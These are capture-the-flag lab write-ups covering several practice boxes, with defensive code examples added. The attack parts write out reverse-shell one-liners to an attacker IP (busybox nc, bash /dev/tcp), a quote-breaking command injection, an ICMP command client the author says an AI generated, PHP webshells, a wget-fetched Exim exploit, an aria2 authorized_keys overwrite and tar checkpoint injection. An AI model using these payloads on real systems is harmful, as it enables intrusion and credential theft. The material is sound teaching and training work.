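Only echo requests are alerted on here; replies carry the same framing, so matching type 0 as well (or simply any ICMP payload that starts with the trigger) is a one-line change if you want to see the command output leaving the host too.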
Got an AI to produce a client script
#!/usr/bin/env python3
# icmp_client.py
import struct
import time
from scapy.all import IP, ICMP, Raw, send, sniff

TRIGGER = b"Mazesec"
TARGET = "192.168.3.183"  # <-- change to the target IP
TIMEOUT = 5

def make_payload(cmd: str) -> bytes:
    b = cmd.encode('utf-8')
    return TRIGGER + struct.pack('>I', len(b)) + b

def send_command_and_wait(target_ip: str, cmd: str, timeout: int = TIMEOUT):
    payload = make_payload(cmd)
    pkt = IP(dst=target_ip) / ICMP(type=8, id=0x1234, seq=0x1) / Raw(load=payload)
    send(pkt, verbose=0)
    # sniff for the ICMP Echo Reply (type 0) from the target whose payload starts with TRIGGER
    def filter_fn(x):
        try:
            return x.haslayer(ICMP) and x[ICMP].type == 0 and x[IP].src == target_ip and x.haslayer(Raw) and bytes(x[Raw].load).startswith(TRIGGER)
        except Exception:
            return False

    pkts = sniff(lfilter=filter_fn, timeout=timeout, count=1)
    if not pkts:
        print("[!] No reply")
        return None
    load = bytes(pkts[0][Raw].load)
    # parse: skip TRIGGER, read 4-byte length, then data
    try:
        off = len(TRIGGER)
        out_len = struct.unpack('>I', load[off:off+4])[0]
        data = load[off+4:off+4+out_len]
        return data.decode('utf-8', errors='ignore')
    except Exception as e:
        print("[!] Parse error:", e)
        return None

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 3:
        print("Usage: sudo python icmp_client.py <target_ip> <command>")
        sys.exit(1)
    tgt = sys.argv[1]
    cmd = " ".join(sys.argv[2:])
    print(f"[+] Sending command to {tgt}: {cmd}")
    out = send_command_and_wait(tgt, cmd, timeout=8)
    if out is None:
        print("[!] No response or parse failure")
    else:
        print("----- RESPONSE BEGIN -----")
        print(out)
        print("----- RESPONSE END -----")
sudo python3 icmp_client.py 192.168.3.183 "whoami"
It echoes the id back as zero, but it keeps dropping and sometimes commands don't run; try a reverse shell
sudo python3 icmp_client.py 192.168.3.183 "busybox nc 192.168.3.236 4444 -e /bin/sh"
[+] Sending command to 192.168.3.183: busybox nc 192.168.3.236 4444 -e /bin/sh
[!] No reply
[!] No response or parse failure
It does report an error, but the shell came back anyway 🤡
nc -lvvp 4444
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
Read /home/zero/user.txt directly
Use the same method as before to get a stable shell:
/usr/bin/script -qc /bin/bash /dev/null
In the interactive shell, view the full py
cat icmp.py
![vmware_CFf9ubKoLM](HackmyVm-babyshell/2025-11/vmware_CFf9ubKoLM.png)
def execute_command_as_user(self, command, uid=1000, timeout=30):
    try:
        # run the command as the given user via sudo
        result = subprocess.check_output(
            f"sudo -u zero bash -c '{command}'",
            shell=True,
            stderr=subprocess.STDOUT,
            timeout=timeout,
            text=True
        )
        return result
    except subprocess.TimeoutExpired:
        return f"Error: Command timeout"
    except subprocess.CalledProcessError as e:
        return f"Error: Exit code {e.returncode}\nOutput: {e.output}"
    except Exception as e:
        return f"Error: {str(e)}"
(only the important part shown)
The command is spliced into a shell string, and the string runs under sudo
So directly:
sudo python3 icmp_client.py 192.168.3.183 "';bash -c 'bash -i >&/dev/tcp/192.168.3.236/2333 0>&1''"
nc -lvvp 2333
listening on [any] 2333 ...
192.168.3.183: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.183] 44174
bash: cannot set terminal process group (356): Inappropriate ioctl for device
bash: no job control in this shell
root@BabyShell:/# // got root
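The root shell above comes from one line: `f"sudo -u zero bash -c '{command}'"` with `shell=True`. A single quote in the command closes the quoted argument and everything after it is parsed as new shell syntax, running in the context of the process that called sudo. The following is an added example, not code from the box: the same construction beside the form that hands the text to the shell as one argv element, run locally against `/bin/sh` with `echo` (no sudo, no network) so the difference is visible in the output. The injection string is constructed for the demonstration.

```python
# Added example (not from the writeup): shell-string splicing versus passing
# user text as a single argument. Uses /bin/sh and echo only.
import shlex
import subprocess

# Constructed: closes the open quote, adds a command, reopens a quote so syntax stays valid
INJECTION = "'; echo INJECTED; echo '"

def run_unsafe(user_text: str) -> str:
    """Same shape as execute_command_as_user(): text spliced into a quoted shell string."""
    cmd = f"sh -c 'echo {user_text}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def run_safe(user_text: str) -> str:
    """The text travels as argv[3] and is read by the inner shell as "$1": never re-parsed."""
    argv = ["sh", "-c", 'echo "$1"', "_", user_text]
    return subprocess.run(argv, capture_output=True, text=True).stdout

def quoted_command_line(user_text: str) -> str:
    """If a single string is unavoidable, shlex.quote() makes the text a literal."""
    return f"sh -c {shlex.quote('echo ' + user_text)}"

if __name__ == "__main__":
    print("unsafe:", repr(run_unsafe(INJECTION)))   # contains an INJECTED line
    print("safe:  ", repr(run_safe(INJECTION)))     # the text is echoed back literally
    print("quoted:", quoted_command_line(INJECTION))
```

`run_safe` keeps the shell out of the loop entirely: the argument list goes straight to `execve`, and the inner `sh -c` treats `$1` as data. Where the original needed `sudo -u zero`, the same list form applies (`["sudo", "-u", "zero", "--", "sh", "-c", 'echo "$1"', "_", text]`); the point is that user input is never concatenated into a string a shell will tokenize.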

babyauth

Open the box; fscan and dirsearch first

Found a login form: http://192.168.3.237/login.php

A login form can have SQL injection, XSS and similar bugs; since the dir scan turned up only this one page, tried brute-forcing the login and testing for bugs, and the brute force succeeded
admin/iloveyou
http://192.168.3.237/admin.php?search=1
http://192.168.3.237/admin.php?search=1%27+or+1%3D1%23 //1' or 1=1#
SQL injection exists; scan it with sqlmap:
python sqlmap.py -u "http://192.168.3.237:80/admin.php?search=1%27+or+1%3D1%23" --dbs --cookie="PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo"
available databases [2]:
[*] information_schema
[*] target_db

-u "http://192.168.3.237:80/admin.php?search=1%27+or+1%3D1%23" -D target_db --tables --cookie="PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo"
Database: target_db
[3 tables]
+---------+
| path |
| credit |
| product |
+---------+

-u "http://192.168.3.237:80/admin.php?search=1%27+or+1%3D1%23" -D target_db -T credit --schema --cookie="PHPSESSID=tk7ogtoevdljgfatikhhrlkrpo"
Database: target_db
Table: path
[1 column]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| secret_path | varchar(255) |
+-------------+--------------+

Database: target_db
Table: credit
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
| username | varchar(50) |
+----------+-------------+
Table: credit
[1 entry]
+----------------------------------+----------+
| password | username |
+----------------------------------+----------+
| ff5e66b76340c5636aa40e7c6a46628f | lingmj |
+----------------------------------+----------+
ff5e66b76340c5636aa40e7c6a46628f, MD5 lookup -> xiaomi (but logging in with it doesn't work)
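The `search=1' or 1=1#` parameter that sqlmap drove above only works because the search term is pasted into the SQL text. The following is an added example, not the target's PHP: the same query shape written once by string formatting and once with a bound parameter, against an in-memory SQLite database constructed here (SQLite has no `#` comment, so the payload uses the equivalent `' OR '1'='1` form).

```python
# Added example (not from the writeup): string-built query versus bound
# parameter. The product table and the payload are constructed.
import sqlite3
from typing import List, Tuple

PAYLOAD = "1' OR '1'='1"   # constructed; same idea as the 1' or 1=1# seen above

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO product (name) VALUES (?)",
                     [("router",), ("switch",), ("firewall",)])
    return conn

def search_unsafe(conn: sqlite3.Connection, term: str) -> List[Tuple[int, str]]:
    # The term is pasted into the statement: the quote in the payload ends the
    # string literal and the remainder is executed as SQL.
    sql = f"SELECT id, name FROM product WHERE name = '{term}'"
    return conn.execute(sql).fetchall()

def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple[int, str]]:
    # Bound parameter: the driver sends the term as a value, never as SQL text.
    return conn.execute("SELECT id, name FROM product WHERE name = ?", (term,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("unsafe, payload:", search_unsafe(db, PAYLOAD))   # every row
    print("safe, payload:  ", search_safe(db, PAYLOAD))     # no row is literally named that
    print("safe, normal:   ", search_safe(db, "switch"))
```

With the bound form the payload is just an unusual product name that matches nothing; the query structure cannot change no matter what the client sends, which is the property `--dbs` and `--dump` rely on being absent.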


Anyway, a whole series of scans
Table: path
+-----------------------------------+
| secret_path |
+-----------------------------------+
| /var/www/html/SsssssssuperSecret/ |
+-----------------------------------+
Found the directory http://192.168.3.237/SsssssssuperSecret/; a further dir scan finds: user.txt, shell.php, /index.html
shell.php is a simulated terminal
busybox nc 192.168.3.236 4444 -e /bin/bash
nc -lvvp 4444     
listening on [any] 4444 ...
id
192.168.3.237: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.237] 54840
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash /dev/null // stabilise the shell; got user
Try su - root
It asks for a Verification code:
Then look in /opt, checking whether custom tools, config files or vulnerability-related programs (escalation scripts, service configs) are kept there
Found a Google Authenticator config file on the system:
ls -al /opt
total 12
drwxr-xr-x 2 root root 4096 Nov 6 06:43 .
drwxr-xr-x 18 root root 4096 Mar 18 2025 ..
-r--r--r-- 1 root root 141 Nov 6 06:43 .google_authenticator
cat /opt/.goo*
WETZMYJW52CMYLCZIX4EJ4HACQ
" RATE_LIMIT 3 30 1762429231 1762429249
" WINDOW_SIZE 17
" TOTP_AUTH
66503223
88483022
74570865
29377535
29891329
Get the TOTP secret: WETZMYJW52CMYLCZIX4EJ4HACQ
Use oathtool to generate a valid code: oathtool -b --totp "WETZMYJW52CMYLCZIX4EJ4HACQ" -> 549616
Enter the code; the password is xiaomi; got root
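What oathtool did with that base32 string is RFC 6238 TOTP: decode the secret, HMAC-SHA1 it over the 30-second step counter, dynamically truncate, and take six digits. The implementation below is an added example, not from the writeup or from the PAM module on the box; it uses the RFC 6238 test-vector secret rather than the one found in `/opt`, and includes the verifier side with the acceptance window that the `WINDOW_SIZE` line in `.google_authenticator` controls.

```python
# Added example (not from the writeup): RFC 6238 TOTP generation and verification.
# RFC_SECRET is the RFC 6238 test vector, not the secret from the target.
import base64
import hashlib
import hmac
import struct
import time

STEP = 30
DIGITS = 6

def totp(secret_b32: str, unix_time: int, step: int = STEP, digits: int = DIGITS) -> str:
    """Code for the time step containing unix_time (HMAC-SHA1, dynamic truncation)."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)   # restore base32 padding
    key = base64.b32decode(padded)
    counter = unix_time // step
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

def verify(secret_b32: str, code: str, unix_time: int, window: int = 1) -> bool:
    """Accept the current step and `window` steps on either side; constant-time compare.

    Google Authenticator's WINDOW_SIZE plays this role; a large value (17 in the
    file above) widens the interval during which an observed code stays valid.
    """
    return any(hmac.compare_digest(totp(secret_b32, unix_time + k * STEP), code)
               for k in range(-window, window + 1))

RFC_SECRET = base64.b32encode(b"12345678901234567890").decode()   # test-vector key

if __name__ == "__main__":
    for t in (59, 1111111109, 1234567890):
        print(t, totp(RFC_SECRET, t))          # 287082, 081804, 005924
    print("now:", totp(RFC_SECRET, int(time.time())))
```

A verifier should also remember the last accepted counter and refuse it again (the `RATE_LIMIT` line in the same file is the companion control); otherwise a code seen once in the window stays reusable for the whole window.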

Aria

fscan and nmap
sudo nmap -Pn -p- -sT 192.168.3.83
./fscan -h 192.168.3.83
Found
22/tcp open ssh
80/tcp open http
1337/tcp open waste
Browse to port 80 and connect to 1337 with nc
└─# nc 192.168.3.83 1337
--- Aria Internal Service Debug Shell ---
--- To exit, type 'exit' ---

--- Recent Upload Paths ---
Log file not found.
--- End of Log ---
Browsing port 80 and dir-scanning finds upload.php, a file upload
GIF89a
<?= exec($_GET['0']); ?>
Then connect with nc again
└─# nc 192.168.3.83 1337
--- Aria Internal Service Debug Shell ---
--- To exit, type 'exit' ---

--- Recent Upload Paths ---
Sun 16 Nov 2025 04:12:57 AM EST: New file created: /var/www/html/uploads/756dfdd36d83c0bf213fb615014f6b2b.gif
Request the uploaded file; it works
?0=busybox nc 192.168.56.247 9427 -e /bin/bash // reverse shell
/usr/bin/script -qc /bin/bash /dev/null // stable shell
cat -A /home/aria/user.txt
flag{user-d13adadc6bbc1391394a5198cba2d1d7}$
M-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^LM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^KM-bM-^@M-^LM-bM-^@M-^L
These are zero-width / control characters
Paste the flag with its invisible characters into a decoder site; it yields the token: maze-sec
Check listening ports: ss -lntp
LISTEN 0 128 127.0.0.1:6800 0.0.0.0:*
www-data@Aria:/var/www/html/uploads$ ps aux | grep aria
root 337 0.0 0.1 56660 2644 ? Ss 04:00 0:03 /usr/bin/aria2c --conf-path=/root/.aria2/aria2.conf
It is running as root; test whether the vulnerable port is reachable
www-data@Aria:/var/www/html/uploads$ curl -s http://127.0.0.1:6800/jsonrpc \
> -H 'Content-Type: application/json' \
> -d '{"jsonrpc":"2.0","method":"aria2.getVersion","id":"Q1"}'
{"id":"Q1","jsonrpc":"2.0","error":{"code":1,"message":"Unauthorized"}}
Unauthorized, so authentication is enabled; use the token recovered from user.txt
www-data@Aria:/var/www/html/uploads$ curl -s http://127.0.0.1:6800/jsonrpc \
> -H 'Content-Type: application/json' \
> -d '{"jsonrpc":"2.0","method":"aria2.getVersion","id":"Q1","params":["token:maze-sec"]}'
{"id":"Q1","jsonrpc":"2.0","result":{"enabledFeatures":["Async DNS","BitTorrent","Firefox3 Cookie","GZip","HTTPS","Message Digest","Metalink","XML-RPC","SFTP"],"version":"1.35.0"}}
Version info comes back, so the hole is there

Start an HTTP server on the attack box and save your own public key in an authorized_keys file

┌──(root㉿kali)-[~]
└─# python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
www-data@Aria:/var/www/html/uploads$
curl -s http://127.0.0.1:6800/jsonrpc \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc":"2.0",
"method":"aria2.addUri",
"id":"Q1",
"params":[
"token:maze-sec",
["http://192.168.3.236:8080/authorized_keys"],
{"dir":"/root/.ssh/", "out":"authorized_keys"}
]
}'
SSH in: root

DC-8

Port scan again finds 22 and 80; click the box beside the site

?uid=1: entering uid=1' gives an error, so it should be SQL injection; hit it with sqlmap directly
-D d7db -T users -C name,pass --dump
Found the account and password
name | pass |
+--------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
The hint says to crack the passwords with john
Result:
john
turtle
dirsearch the directories: /robots.txt /user/login; log in with john/turtle
Logged in; then clicked around everywhere -> under Contact Us there is a page Web Form -> Form settings
It accepts PHP code; write in a reverse shell
<p>wea5e1</p>
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.3.236/4444 0>&1'");
?>
nc listener
nc -lvvp 4444
192.168.3.1: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.1] 37894
bash: cannot set terminal process group (372): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-8:/var/www/html$
Check permissions
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
Found /usr/sbin/exim4
/usr/sbin/exim4 --version
searchsploit exim
4.87-4.91 Exim 4.87 - 4.91 - Local Privilege Escalation           | linux/local/46996.sh
Remember: first cd /tmp on that box
searchsploit -m linux/local/46996.sh
wget http://192.168.3.236:4444/46996.sh
www-data@dc-8:/tmp$ wget http://192.168.3.236:8000/46996.sh
wget http://192.168.3.236:8000/46996.sh
--2025-11-19 22:54:49-- http://192.168.3.236:8000/46996.sh
Connecting to 192.168.3.236:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'

46996.sh 100%[===================>] 3.47K --.-KB/s in 0.001s

2025-11-19 22:54:49 (2.68 MB/s) - '46996.sh' saved [3552/3552]
chmod +x 46996.sh
./46996.sh -m netcat
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim) // got root

111z

user

Boot the box

sudo arp-scan -I eth1 192.168.3.0/24 // found host 192.168.3.128
nmap -p- -sT 192.168.3.128
./fscan -h 192.168.3.128 // only ports 22 and 80
dirsearch 192.168.3.128 (the usual trio); found uploads
curl 192.168.3.128
Browsing the site shows it is a file-upload box; testing shows many functions are banned, e.g. eval, system, ; and so on
But PHP has plenty of quirks: ?> lets the final PHP statement go without a semicolon, and function names are case-insensitive

Option 1

<?php evAl($_POST[1])?>
POST /upload.php HTTP/1.1
Host: 192.168.3.128
Content-Length: 599
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarys8mDFzHGXbyy6bNh
Accept: */*
Origin: http://192.168.3.128
Referer: http://192.168.3.128/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

------WebKitFormBoundarys8mDFzHGXbyy6bNh
Content-Disposition: form-data; name="file"; filename="3.php"
Content-Type: image/png

<?php evAl($_POST[1])?>
{"success":true,"error":null,"filepath":"691ef2afe8042.php"}

Then you find it can't execute anything; but disabled command-execution functions don't affect reading files or listing directories, so use AntSword to browse directories and files one by one; llpass.txt holds the SSH password of user ll

Option 2

Since commands can't be executed, use just the webshell to list chosen directories and read sensitive files to gather information.

<?php $dir=$_GET[1]?>
<?php $file=$_GET[2]?>
<?php echo '<pre>'?>
<?php print_r(scandir($dir))?>
<?php echo '</pre>'?>
<?php highlight_file($file)?>
Array
(
  [0] => .
  [1] => ..
  [2] => bin
  [3] => boot
  [4] => dev
  [5] => etc
  [6] => home
  [7] => initrd.img
  [8] => initrd.img.old
  [9] => lib
  [10] => lib32
  [11] => lib64
  [12] => libx32
  [13] => lost+found
  [14] => media
  [15] => mnt
  [16] => opt
  [17] => proc
  [18] => root
  [19] => run
  [20] => sbin
  [21] => srv
  [22] => sys
  [23] => tmp
  [24] => usr
  [25] => var
  [26] => vmlinuz
  [27] => vmlinuz.old
)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
ll:x:1000:1000::/home/ll:/bin/bash
mj:x:1001:1001::/home/mj:/bin/bash
?1=/&2=/etc/passwd

List directories

?1=/opt&2=/opt/ll*
Array
(
  [0] => .
  [1] => ..
  [2] => backup
  [3] => llpass.txt
)
ll:Bp2tFMYfElkoMWlOUsOD1C30

Option 3

Still the same as above, couldn't run commands; tried phpinfo(); and got output

disable_functions

    pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,system

Because the php configuration disables almost every command-execution function, if /tmp is writable and the putenv, mail and error_log functions are still available, you can upload a malicious shared library to /tmp, use putenv to set an environment variable, and then have mail or error_log start a child process that loads the malicious library, which gives code execution.

You can use the AntSword (中国蚁剑) plugin to bypass disable_functions directly: Auxiliary tools => Bypass disable functions - 192.168.3.128, then upload a small webshell.
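The bypass above only works because putenv, mail and error_log were left out of disable_functions. Added here as a check (not code from the writeup or from AntSword): a small shell script that compares a php.ini disable_functions value against a baseline list and prints what is still callable. REQUIRED is an assumption made up of the execution functions already disabled on this box plus the three the shared-library bypass depends on; the sample value is the one phpinfo() reported above.

```shell
# Added example: audit a php.ini disable_functions value.
# REQUIRED is an assumed baseline, not anything the box or PHP defines.
REQUIRED="exec shell_exec system passthru popen proc_open dl putenv mail error_log"

# Print the REQUIRED names absent from the comma-separated list in $1.
# Whitespace in the php.ini value is ignored, as PHP itself ignores it.
missing_from_disable_functions() {
    list=$(printf '%s' "$1" | tr -d '[:space:]')
    out=""
    for fn in $REQUIRED; do
        case ",$list," in
            *",$fn,"*) ;;            # present: disabled, nothing to report
            *) out="$out $fn" ;;     # absent: still callable from PHP
        esac
    done
    printf '%s\n' "${out# }"
}

# Pull the disable_functions value out of a php.ini-style file ($1).
disable_functions_from_ini() {
    sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$1" | head -n 1
}

# Constructed sample: the value phpinfo() showed on this box.
BOX_DISABLE_FUNCTIONS="pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,system"

# Constructed php.ini fragment carrying that value.
INI_SAMPLE=$(mktemp)
printf 'disable_functions = %s\n' "$BOX_DISABLE_FUNCTIONS" > "$INI_SAMPLE"

echo "still callable: $(missing_from_disable_functions "$(disable_functions_from_ini "$INI_SAMPLE")")"
```

On a live host the value can be read with php -r 'echo ini_get("disable_functions");' instead of parsing the ini file. Pairing the list with a noexec mount on /tmp removes the other half of the precondition the writeup names.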

Then it's the same as before: look up the password

Privilege escalation

sudo -l shows that neofetch can be run as user mj without a password

ll@111z:/home$ sudo -l
Matching Defaults entries for ll on 111z:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ll may run the following commands on 111z:
  (mj) NOPASSWD: /usr/bin/neofetch
https://gtfobins.github.io/gtfobins/neofetch/#shell
ll@111z:/home$ echo 'exec bash' > /tmp/config.txt
ll@111z:/home$ sudo -u mj /usr/bin/neofetch --config /tmp/config.txt
mj@111z:/home$ ls
ll mj
mj@111z:/home$ cd ./mj
mj@111z:~$ ls
user.txt
mj@111z:~$ cat u*
flag{user-5450dba90b514d69935be5eafbfd0077}
mj@111z:~$ sudo -l
Matching Defaults entries for mj on 111z:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mj may run the following commands on 111z:
  (root) NOPASSWD: /opt/backup/backup.sh
mj@111z:~$ cat /opt/backup/backup.sh
#!/bin/bash
# Backup script for website uploads

cd /var/www/html/uploads
tar czf /tmp/backup.tar.gz *
echo "Backup completed"

This sh file uses the wildcard *

https://www.freebuf.com/articles/system/176255

So just do it directly

cd /var/www/html/uploads
mj@111z:/var/www/html/uploads$ echo '' > '--checkpoint-action=exec=sh shell.sh'
mj@111z:/var/www/html/uploads$ echo '' > '--checkpoint=1'
mj@111z:/var/www/html/uploads$ echo -e '#!/bin/bash\ncp /bin/bash /var/www/html/uploads/bash\nchmod u+s
> /var/www/html/uploads/bash' > shell.sh
mj@111z:/var/www/html/uploads$ sudo /opt/backup/backup.sh
cp: cannot create regular file '/var/www/html/uploads/bash': Text file busy
chmod: missing operand after 'u+s'
Try 'chmod --help' for more information.
root@111z:/var/www/html/uploads# id
uid=0(root) gid=0(root) groups=0(root)
Got root
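The root cause here is that tar czf /tmp/backup.tar.gz * lets the shell expand upload names into tar's argument list, so a file named like an option is parsed as one. Added example, not the box's backup.sh: a pre-flight check that flags names tar would read as options, and a backup that archives the directory itself so names stay data inside the archive. The demo directory and its file names are constructed.

```shell
# Added example: detect and avoid tar wildcard argument injection.

# Print every entry in $1 whose name starts with "-" (tar would parse it as
# an option such as --checkpoint-action). Returns 1 if any were found.
check_wildcard_args() {
    dir=$1
    found=0
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || continue          # unmatched glob stays literal
        name=${f##*/}
        case $name in
            -*) echo "suspicious: $name"; found=1 ;;
        esac
    done
    return $found
}

# Safe replacement for `cd dir && tar czf out *`: archive the directory
# contents via -C so the shell never expands file names into arguments.
safe_backup() {
    src=$1
    out=$2
    tar czf "$out" -C "$src" .
}

# Constructed demo directory: one real upload plus two option-shaped names.
demo_dir=$(mktemp -d)
printf 'real upload\n' > "$demo_dir/photo.txt"
: > "$demo_dir/--checkpoint=1"
: > "$demo_dir/--checkpoint-action=exec=sh shell.sh"

check_wildcard_args "$demo_dir" || echo "option-shaped names found in $demo_dir"
safe_backup "$demo_dir" "$demo_dir.tar.gz" && echo "archived $(tar tzf "$demo_dir.tar.gz" | wc -l) entries"
```

With -C the two planted names end up as ordinary entries ./--checkpoint=1 and ./--checkpoint-action=exec=sh shell.sh in the archive and nothing is executed; the check function is for a cron job or a monitoring rule that refuses to back up an upload directory containing such names.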

yibasuo

user

Boot the box, then do information gathering

sudo arp-scan -I eth0 192.168.3.0/24

Found the target address:

192.168.3.248

